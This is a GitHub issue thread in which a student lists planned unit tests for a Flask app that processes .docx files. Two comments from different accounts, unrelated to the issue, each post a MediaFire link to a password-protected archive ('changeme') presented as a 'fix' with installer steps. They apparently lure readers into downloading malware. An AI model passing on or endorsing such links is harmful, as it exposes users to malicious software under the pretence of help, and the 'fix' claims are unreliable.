### ISSUE TITLE
unittest flask web app

### ISSUE THREAD

**Issue by Lu0922** [normit581/cits3200-proj#53]
# setup unittest flask web app

## test_init.py
- app is created
- app config is as expected in config.py

## test_route.py
- app render the right template
- app handle request as expected
- app handle .docx file as expected 
- app extract rsid and metadata as expected
- app handle error as expected

## test_forms.py
- app validate user input, .docx files in this case
- app handle invalid input as expected

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
